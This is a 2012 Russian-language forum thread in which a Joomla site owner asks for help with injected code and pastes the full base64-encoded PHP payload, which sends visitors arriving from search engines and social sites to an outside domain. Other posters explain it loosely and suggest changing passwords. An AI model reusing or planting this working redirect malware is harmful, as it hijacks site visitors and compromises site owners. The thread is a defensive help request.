Помощь Вирус

Sudba · 12 Дек 2012

Всем привет. На джумле появился код вида:

eval(base64_decode***

удалил его через автозамену.
А как спастись от дальнейшего проникновения то?
Пароли на доступы менял.

edward1995 · 12 Дек 2012

ну для начала скинь код ))) сюда без хайда я расщефрую и тогда скажем что делает вирус )) и как с ним бороться
eval(base64_decode* Это значит что он закодирован )))

Sudba · 12 Дек 2012

Вот код:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9hbGxjb2RlZXIucXBvZS5jb20vIik7DQoJCWV4aXQoKTsNCgl9DQp9DQp9"));

akifjev · 12 Дек 2012

Скрипт если определяет, что страницу запрашивает поисковый робот, то автоматом отправляет этого робота на сайт:

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

edward1995 · 12 Дек 2012

повторюсь более открыто

Скрытое содержимое доступно для зарегистрированных пользователей!

он перенаправляет поисковый робот на определенную страницы какие конкретна поисковики видно по скрипту верху

Sudba · 13 Дек 2012

Так я его удалил. Как себя защитить то?

edward1995 · 13 Дек 2012

ну так и все ))) глянь фтп пароли и ssh и глянь есть может стремные компоненты

Roamer · 13 Дек 2012

так..... Автор, подробнее - как ты выследил, что появился инородный код? В каком файле нашел? У меня стоит скрытый блок с двумя ссылками.

Как еще могут зашифровать этот код? Какие словосочетания нужно попробовать поискать?

edward1995 · 13 Дек 2012

Roamer написал(а):
так..... Автор, подробнее - как ты выследил, что появился инородный код? В каком файле нашел? У меня стоит скрытый блок с двумя ссылками. Как еще могут зашифровать этот код? Какие словосочетания нужно попробовать поискать?

просто открыл и зная что джумла не зашифрована )) нашел странный код ) вот и все ) если ты нашел что-то странное код сюда нас тут много ))) раскодируем :-]

и закодируем )))

al-teen · 13 Дек 2012

Ну прямо и взяться левому коду неоткуда, ага? Меньше хлама с варезников типа жумла-мастер будете в след. раз ставить.

Помощь Вирус

Sudba

Гуру форума

edward1995

Создатель

Sudba

Гуру форума

akifjev

Профессор

edward1995

Создатель

Sudba

Гуру форума

edward1995

Создатель

Roamer

Создатель

edward1995

Создатель

al-teen

Постоялец